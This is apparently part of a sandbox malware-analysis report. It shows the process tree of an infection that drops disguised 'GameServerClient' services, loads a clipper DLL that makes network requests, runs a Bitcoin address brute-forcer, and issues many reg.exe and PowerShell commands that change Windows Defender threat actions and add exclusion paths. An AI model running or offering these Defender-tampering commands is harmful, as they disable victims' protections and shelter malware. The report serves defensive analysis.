                                                                              • C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe"
                                                                                2⤵
                                                                                • Checks computer location settings
                                                                                • Executes dropped EXE
                                                                                • Drops file in Program Files directory
                                                                                PID:4876
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameServerClient\installg.bat" "
                                                                                  3⤵
                                                                                    PID:4732
                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                      Sc delete GameServerClient
                                                                                      4⤵
                                                                                      • Launches sc.exe
                                                                                      PID:5048
                                                                                    • C:\Program Files (x86)\GameServerClient\GameService.exe
                                                                                      GameService remove GameServerClient confirm
                                                                                      4⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:4316
                                                                                    • C:\Program Files (x86)\GameServerClient\GameService.exe
                                                                                      GameService install GameServerClient "C:\Program Files (x86)\GameServerClient\GameServerClient.exe"
                                                                                      4⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:3228
                                                                                    • C:\Program Files (x86)\GameServerClient\GameService.exe
                                                                                      GameService start GameServerClient
                                                                                      4⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:3508
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameServerClient\installc.bat" "
                                                                                    3⤵
                                                                                      PID:5812
                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                        Sc delete GameServerClientC
                                                                                        4⤵
                                                                                        • Launches sc.exe
                                                                                        PID:6060
                                                                                      • C:\Program Files (x86)\GameServerClient\GameService.exe
                                                                                        GameService remove GameServerClientC confirm
                                                                                        4⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:4296
                                                                                      • C:\Program Files (x86)\GameServerClient\GameService.exe
                                                                                        GameService install GameServerClientC "C:\Program Files (x86)\GameServerClient\GameServerClientC.exe"
                                                                                        4⤵
                                                                                          PID:3568
                                                                                        • C:\Program Files (x86)\GameServerClient\GameService.exe
                                                                                          GameService start GameServerClientC
                                                                                          4⤵
                                                                                            PID:5840
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
                                                                                          3⤵
                                                                                            PID:5612
                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                          "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
                                                                                          2⤵
                                                                                          • Blocklisted process makes network request
                                                                                          • Loads dropped DLL
                                                                                          PID:3228
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 808 -ip 808
                                                                                        1⤵
                                                                                          PID:4676
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 3384 -ip 3384
                                                                                          1⤵
                                                                                            PID:4672
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4728 -ip 4728
                                                                                            1⤵
                                                                                              PID:2516
                                                                                            • C:\Program Files (x86)\GameServerClient\GameService.exe
                                                                                              "C:\Program Files (x86)\GameServerClient\GameService.exe"
                                                                                              1⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:4188
                                                                                              • C:\Program Files (x86)\GameServerClient\GameServerClient.exe
                                                                                                "C:\Program Files (x86)\GameServerClient\GameServerClient.exe"
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:4904
                                                                                                • C:\Windows\Temp\94816.exe
                                                                                                  "C:\Windows\Temp\94816.exe" --list-devices
                                                                                                  3⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Loads dropped DLL
                                                                                                  PID:2296
                                                                                            • C:\Windows\system32\svchost.exe
                                                                                              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                              1⤵
                                                                                                PID:1640
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                1⤵
                                                                                                  PID:1044
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 5384 -ip 5384
                                                                                                  1⤵
                                                                                                    PID:5820
                                                                                                  • C:\Program Files (x86)\GameServerClient\GameService.exe
                                                                                                    "C:\Program Files (x86)\GameServerClient\GameService.exe"
                                                                                                    1⤵
                                                                                                      PID:5876
                                                                                                      • C:\Program Files (x86)\GameServerClient\GameServerClientC.exe
                                                                                                        "C:\Program Files (x86)\GameServerClient\GameServerClientC.exe"
                                                                                                        2⤵
                                                                                                          PID:5924
                                                                                                          • C:\Windows\Temp\161509.exe
                                                                                                            "C:\Windows\Temp\161509.exe" --coin BTC -m ADDRESSES -t 0 --range 30035452740000000:30035452760000000 -o xxx0.txt -i C:\Windows\Temp\curjob.bin
                                                                                                            3⤵
                                                                                                              PID:5332
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3560 -ip 3560
                                                                                                          1⤵
                                                                                                            PID:4492
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\ELkipDb.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\ELkipDb.exe em /xmsite_idujV 385118 /S
                                                                                                            1⤵
                                                                                                              PID:4932
                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                                                                                2⤵
                                                                                                                  PID:1876
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                    3⤵
                                                                                                                      PID:5756
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                        4⤵
                                                                                                                          PID:1640
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                                                        3⤵
                                                                                                                          PID:5744
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                                                          3⤵
                                                                                                                            PID:3568
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                                                            3⤵
                                                                                                                              PID:5988
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                                                              3⤵
                                                                                                                                PID:3896
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                                                                3⤵
                                                                                                                                  PID:3796
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                                                                  3⤵
                                                                                                                                    PID:3656
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                                                    3⤵
                                                                                                                                      PID:5328
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                                                                      3⤵
                                                                                                                                        PID:5708
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                                                        3⤵
                                                                                                                                          PID:5104
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                                                          3⤵
                                                                                                                                            PID:1692
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                                                            3⤵
                                                                                                                                              PID:3880
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                                                              3⤵
                                                                                                                                                PID:1648
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                                                                3⤵
                                                                                                                                                  PID:4940
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                                                                  3⤵
                                                                                                                                                    PID:2272
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                                                                    3⤵
                                                                                                                                                      PID:4316
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                      3⤵
                                                                                                                                                        PID:2068
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                        3⤵
                                                                                                                                                          PID:5380
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                          3⤵
                                                                                                                                                            PID:4992
                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                            3⤵
                                                                                                                                                              PID:4544
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                                                              3⤵
                                                                                                                                                                PID:2784
                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:2596
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:4456
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:2520
                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:3264
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:1120
                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:4492
                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:5656
                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:4856
                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:5368
                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                    4⤵
                                                                                                                                                                                      PID:1300
                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:2272
                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:4316
                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:2068
                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:5380
                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:4992
                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:4544
                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:2784
                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:2596
                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:4456
                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:3496
                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:5144
                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
